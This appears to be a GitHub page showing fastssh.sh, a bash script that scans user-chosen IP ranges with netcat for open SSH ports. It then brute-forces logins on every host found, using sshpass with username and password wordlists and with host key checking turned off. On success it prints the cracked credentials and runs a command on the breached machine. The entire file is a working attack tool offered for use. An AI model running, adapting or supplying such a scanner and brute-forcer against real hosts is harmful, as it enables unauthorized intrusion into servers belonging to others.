-
Notifications
You must be signed in to change notification settings - Fork 53
/
fastssh.sh
131 lines (110 loc) · 4.72 KB
/
fastssh.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#!/bin/bash
banner() {
printf "\e[1;91m ______\e[0m\e[1;77m _____ _ ____ ____ _ _ \e[0m\n"
printf "\e[1;91m \ \ \ \\\\\e[0m\e[1;77m| ___|_ _ ___| |_/ ___/ ___|| | | | \e[0m\n"
printf "\e[1;91m \ \ \ \ \e[0m\e[1;77m|_ / _\` / __| __\___ \___ \| |_| | \e[0m\n"
printf "\e[1;91m / / / / \e[0m\e[1;77m_| (_| \__ \ |_ ___) |__) | _ | \e[0m\n"
printf "\e[1;91m /_/_/_/\e[0m\e[1;77m|_| \__,_|___/\__|____/____/|_| |_| v1.0\e[0m\n"
printf "\n"
printf "\e[1;100m Author: thelinuxchoice (Github/Instagram) \e[0m\n\n"
}
dependencies() {
command -v nc > /dev/null 2>&1 || { echo >&2 "I require NetCat. Run: apt-get install nc. Aborting."; exit 1; }
command -v sshpass > /dev/null 2>&1 || { echo >&2 "I require sshpass. Run: apt-get install sshpass. Aborting."; exit 1; }
}
scan() {
banner
dependencies
read -e -p $'\e[1;37m[::] Put range ip part 1/4 \e[0m\e[91m(e.g.:192 255) \e[0m\e[1;92m -> \e[0m' r1
read -e -p $'\e[1;37m[::] Put range ip part 2/4 \e[0m\e[91m(e.g: 168 255) \e[0m\e[1;92m -> \e[0m' r2
read -e -p $'\e[1;37m[::] Put range ip part 3/4 \e[0m\e[91m(e.g.: 1 255) \e[0m\e[1;92m -> \e[0m' r3
read -e -p $'\e[1;37m[::] Put range ip part 4/4 \e[0m\e[91m(e.g.: 10 255) \e[0m\e[1;92m -> \e[0m' r4
default_port=22
read -e -p $'\e[1;37m[::] Port to scan\e[0m \e[91m(Default 22):\e[0m ' port
port="${port:-${default_port}}"
default_threads=100
read -e -p $'\e[1;37m[::] Numbers of Threads to scan \e[91m(Default 100):\e[0m \e[0m' threads
threads="${threads:-${default_threads}}"
rm -rf targets
for x in $(seq $r1);do for y in $(seq $r2);do for z in $(seq $r3);do for w in $(seq $r4);do
printf "%s.%s.%s.%s\n" $x $y $z $w >> targets
done done done done
rm -rf logip;
count_target=$(wc -l targets | cut -d " " -f1)
printf "\e[1;92m[*] Targets:\e[0m\e[1;77m %s\e[0m\n" $count_target
printf "\e[1;92m[*] Starting scanner...\e[0m\n"
sleep 2
count=0
startline=1
endline="$threads"
while [ $((count+1)) -lt $count_target ]; do
for target in $(sed -n ''$startline','$endline'p' targets); do
let count++
printf "\e[1;93mScanning target:\e[0m\e[77m %s \e[0m\e[1;93m(\e[0m\e[77m%s\e[0m\e[1;93m/\e[0m\e[77m%s\e[0m\e[1;93m)\e[0m\n" $target $count $count_target
{(trap ''SIGINT && check=$(nc $target $port -v -z -w5 > /dev/null 2>&1; echo $?); if [[ $check == "0" ]]; then echo $target >> logip; fi; ) } & done; wait $!;
let startline+=$threads
let endline+=$threads
done
if [[ -f logip ]]; then
countip=$(wc -l logip | cut -d " " -f1)
printf "\e[1;92m[*] IPs Found:\e[0m\e[1;77m %s\e[0m\n" $countip
printf "\e[1;92m[*] Saved:\e[0m\e[1;77m logip\n\e[0m"
default_brute="Y"
read -p $'\e[1;92m[?] Start Brute Forcer?\e[0m\e[1;77m [Y/n]\e[0m' brute
brute="${brute:-${default_brute}}"
if [[ "$brute" == "Y" || "$brute" == "y" || "$brute" == "yes" || "$brute" == "Yes" ]]; then
bruteforcer
else
exit 1
fi
else
printf "\e[1;91m[!] No IPs Found in this range!\e[0m\n"
exit 1
fi
}
bruteforcer() {
banner
dependencies
defaultip_list="logip"
read -p $'\e[1;92m[::] Ip list\e[0m \e[77m(Default: logip): \e[0m' ip_list
ip_list="${ip_list:-${defaultip_list}}"
if [[ ! $ip_list ]]; then
printf "[!] File not found!"
bruteforcer
fi
default_port=22
read -p $'\e[1;92m[::] Port \e[0m\e[77m(Default 22): \e[0m' port
port="${port:-${default_port}}"
default_user="usernames"
default_pass="passwords"
read -p $'\e[1;92m[::] Usernames list \e[0m\e[77m(Hit Enter to Default list): \e[0m' wl_user
wl_user="${wl_user:-${default_user}}"
read -p $'\e[1;92m[::] Passwords list \e[0m\e[77m(Hit Enter to Default list): \e[0m' wl_pass
wl_pass="${wl_pass:-${default_pass}}"
count_ip=$(wc -l $ip_list | cut -d " " -f1)
count_user=$(wc -l $wl_user | cut -d " " -f1)
count_pass=$(wc -l $wl_pass | cut -d " " -f1)
countsum=$((count_ip*count_user*count_pass))
start=1
end=1
IFS=$'\n'
while [ true ]; do
for user in $(cat $wl_user); do
for password in $(cat $wl_pass); do
for ip in $(sed -n ''$start','$end'p' $ip_list); do
IFS=$'\n'
nip=$(grep -n -x "$ip" "$ip_list" | cut -d ":" -f1)
printf "\e[1;93mTrying IP:\e[0m\e[77m %s (%s/%s)\e[0m\e[1;93m User:\e[0m\e[77m %s\e[0m\e[1;93m Pass:\e[0m\e[77m %s\e[0m\n" $ip $nip $count_ip $user $password
{(trap ''SIGINT && check=$(sshpass -p "$password" ssh -o StrictHostKeyChecking=no "$user"@"$ip" -p $port uname -a 2> /dev/null | grep -c "0" ); if [[ $check == "1" ]]; then printf "\e[1;92m\n\n[*] Found! IP:\e[0m\e[1;77m %s\e[0m,\e[1;92m User:\e[0m\e[1;77m %s\e[0m\e[1;92m Password:\e[0m\e[1;77m %s\n\n\e[0m" $ip $user $password ; sshpass -p "$password" ssh -o StrictHostKeyChecking=no "$user"@"$ip" -p $port uname -a ; kill -1 $$; fi ) } & done done; wait $!;
sleep 4
done
let start++
let end++
done
printf "\e[1;91m[!] No credentials found!\e[0m\n"
exit 1
}
case "$1" in --scan) scan ;; --bruteforcer) bruteforcer ;; *)
banner
printf "\e[1;77mUsage: ./fastssh.sh --scan / --bruteforcer\e[0m\n"
esac